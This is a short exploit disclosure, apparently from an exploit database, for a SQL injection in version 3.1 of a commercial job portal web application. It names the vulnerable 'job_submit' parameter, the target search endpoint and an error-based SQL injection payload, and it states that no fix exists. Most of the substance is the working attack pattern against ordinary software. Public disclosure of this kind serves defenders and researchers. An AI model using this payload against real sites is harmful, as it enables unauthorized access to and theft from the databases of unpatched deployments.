Job Portal 3.1 - 'job_submit' SQL Injection

2019-03-28 15:05:31

===========================================================================================
# Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/job-portal/15330095
# Version: v3.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Job portal is developed for creating an interactive
job vacancy for candidates.
This web application is to be conceived in its current form as a dynamic
site-requiring constant
updates both from the seekers as well as the companies.
===========================================================================================
# POC - SQLi
# Parameters : job_submit
# Attack Pattern : convert(int,+cast(0x454d49524f474c55+as+varchar(8000)))
# POST Method : http://localhost/newjobportal/job_search/search
===========================================================================================

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.